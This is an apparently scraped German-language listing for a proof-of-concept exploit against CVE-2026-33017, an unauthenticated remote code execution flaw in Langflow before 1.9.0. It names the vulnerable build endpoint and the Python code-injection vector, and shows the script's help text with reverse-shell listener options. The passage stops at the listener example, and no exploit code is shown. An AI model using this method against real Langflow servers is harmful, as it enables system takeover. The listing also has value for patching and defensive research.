## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-INDUSTRI4L-H3LL-XPL0IT3RS-CVE-2026-33017-LANGFLOW-RCE
# CVE-2026-33017 - Langflow RCE-Schwachstelle
xpl0ited von infrar3d
Dieses Proof-of-Concept-Exploit zielt auf eine kritische Remote Code Execution (RCE)-Schwachstelle in Langflow-Versionen vor 1.9.0 ab. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Systembefehle auszuführen, indem sie bösartigen Python-Code über den Flow-Building-API-Endpunkt einschleusen. Die Schwachstelle existiert im Endpunkt `/api/v1/build_public_tmp/{flow_id}/flow`, der benutzergelieferten Code im Code-Feld von Komponentenvorlagen nicht ordnungsgemäß bereinigt.
### Verwendung:
root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help Hilfe anzeigen und beenden
-u, --url URL Ziel-Basis-URL
-f, --flow FLOW Flow-ID
-H, --host HOST Listener-Host für Reverse Shell
-P, --port PORT Listener-Port (Standard: 4444)
### Beispiel:
Das erste Terminal (Listener):
root@kitploit:~